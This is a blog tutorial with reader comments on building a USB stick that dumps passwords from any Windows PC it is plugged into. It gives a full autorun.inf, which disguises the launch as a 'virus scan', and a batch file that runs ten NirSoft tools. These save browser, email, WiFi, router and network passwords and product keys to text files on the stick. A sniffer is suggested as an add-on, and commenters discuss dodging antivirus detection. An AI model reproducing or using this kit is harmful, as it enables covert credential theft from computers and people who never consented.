Create your USB password recovery for Windows

Very good! As we all know, browsers store passwords for our social networks, email accounts, forums, and any web page that requires a login. Likewise, the Windows operating system also saves the passwords for our WiFi Internet connection, the router password, the computer user passwords, FTP accounts, messaging clients, Windows product keys and stop counting.

So why not make a backup of our passwords? For this task there are numerous programs, but searching, downloading, installing and executing one by one would be very time consuming, instead I propose today a more interesting alternative: create a USB to recover passwords.

It's easy, it will run with 1 click, light in size and 100% efficient. Are you interested? Let's go to trouble!

Preparing the USB recover passwords

Step 1:.- We will need to download some utilities from NirSoft, if you already know them you will know that they are free, of few KB, do not require installation (portable), and without a doubt they are the best 😉
Depending on the passwords you want to recover, Nir Sofer has specific applications for each program, in this example we will use 10 of them.


Step 2:.- Unzip the previous tools in a single folder and copy to your * USB memory only executables, that is, files with the extension .exe which are the programs themselves.

For example, in the case of the "ChromePass" application, you unzip it and copy only the file "ChromePass.exe»To your USB memory.

* At this point, as a matter of better organization, it is recommended to have our Pendrive formatted, without any other file so that the device contains only the programs to recover passwords that we will use. Although if you have other files or folders it will do the same, it is completely optional.

Step 3:.- Open the notepad and paste the following code:

[autorun] open = launch.bat
ACTION = Perform a Virus Scan

Save it with the name «Autorun»(Without quotes) and the extension . Inf in such a way that the file looks like autorun.inf. Then you put that file on your USB stick.

Step 4:.- Open the notepad again and paste in it the following instructions.

start ChromePass.exe / stext ChromePass.txt
start mailpv.exe / stext mailpv.txt
start netpass.exe / stext netpass.txt
start OperaPassView.exe / stext OperaPassView.txt
start PasswordFox.exe / stext PasswordFox.txt
start ProduKey.exe / stext ProduKey.txt
start pspv.exe / stext pspv.txt
start RouterPassView.exe / stext RouterPassView.txt
start WebBrowserPassView.exe / stext WebBrowserPassView.txt
start WirelessKeyView.exe / stext WirelessKeyView.txt

Save it with the name «launch»(Without quotes) and the extension . Beat in such a way that the file looks like launch.bat. Then you put that file on your USB stick.

That is all! You already have ready USB recovers passwords.

How to use and modify it?

Knowing that the file Autorun it "self-executes" when the USB memory is inserted, it will only be a matter of connecting the flash memory to the computer and opening it, with this action immediately, the programs will be called to recover all the stored passwords. Instantly the ".txt" files will also be created which is where each password will be collected.
Once this is done, you simply disconnect the USB memory and you will take a copy of the passwords that were stored on the computer.
What if the autorun is disabled? In that case you run the file «launch.bat»That we have created and in the same way it will collect the passwords stored in the txt files.
To modify this USB memory, it recovers passwords, whether to add or remove programs, the procedure consists of copying the executables and following the parameter of the lines of code.
For example, I want to add the program SniffPass Password Sniffer, I copy its corresponding executable «SniffPass.exe»To the Pendrive and add the following instruction in the file launch.bat:
start SniffPass.exe / stext SniffPass.txt
Note that the executable name is simply placed 😉

Important

This USB will only work if passwords are stored on the computer, otherwise nothing will be recorded. So also everything must be contained in the root of the device, you can hide them that will also be executed.
If you have knowledge you can organize all the executables in a single folder, but always keeping the autorun.inf and launch.bat in the root. The line of code would change to: 
start programfolder.exe / stext program.txt
Download here the prepared folder with all the mentioned content and do not forget to share the article on your social networks if you found it useful. 
Ah! and make good use of your USB 'recover' passwords 😀

Leave a Comment

Your email address will not be published. Required fields are marked with *

*

*

  1. Responsible for the data: Actualidad Blog
  2. Purpose of the data: Control SPAM, comment management.
  3. Legitimation: Your consent
  4. Communication of the data: The data will not be communicated to third parties except by legal obligation.
  5. Data storage: Database hosted by Occentus Networks (EU)
  6. Rights: At any time you can limit, recover and delete your information.

  1.   Marcelo camacho said

    hehe thanks for the data colleague, in fact I did tests with Avast, Avira and NOD32 and none of them have shown any alerts, but if someone else detects something, you could mock by removing the 'autorun.inf' and leaving the 'launch.bat' next to executables only 😉

    Greetings back my friend and thanks for the comment 😀

  2.   Marcelo camacho said

    Thank you very much Pedro, the idea is exactly that, easily recover all kinds of passwords with just 1 click 😉

    A hug friend!

  3.   Actionglobal kike said

    Perfect compilation of rob .. estooo recovers passwords, you missed specifying if you allow me, that it will be detected by many antivirus with a false positive, lol.

    Greetings Marcelo.

  4.   Peter PC said

    Good tutorial, at times when we have so many passwords, we tend to forget about them, it seems like an easy way to recover them.
    Thank you for letting us know.

  5.   Gerardo said

    Very good article Marcelo, it will seem that it plagiarizes the subject, but I swear it is not like that 🙁
    Also days ago I did a song from the same programs; and as some AVS say they will detect them as malicious

    I don't know how you downloaded them, but to download them with chrome and and it blocked the download of all, I had to use the option to recover file.

    What I would like to mention is that these programs are reliable, I have been using operapassview for some time and I have never had problems or strange things.

    regards

  6.   Marcelo camacho said

    Hello Gerardo, friend, do not worry, the good utilities of NirSoft are to share them 😉 I have downloaded them with Chrome and Avast as Antivirus, without any alert.

    It is likely that other AVs when detecting that they are softs to reveal passwords, block them to avoid that task, but as you say, they are 110% reliable 😀

    Greetings and thanks for commenting.
    P.S. I have linked you on the blogroll.

  7.   Gerardo said

    wow thank you very much Marcelo what a detail on your part, I will link you anyway!

  8.   hiber said

    Excellent article, I barely saw it. I recommend you take a look at Lazagne ...

    1.    Marcelo camacho said

      Brilliant! Thank you hiber. The LaZagne project is very interesting, I'm trying it right now 😀
      Actualización.- I just wrote about LaZagne, thank you very much again:

      https://vidabytes.com/2018/02/recuperar-contrasenas-windows-lazagne.html

    2.    Nicolas said

      Does Kapersky detect it in 2019?

  9.   Pepe said

    Your blog is the best Marcelo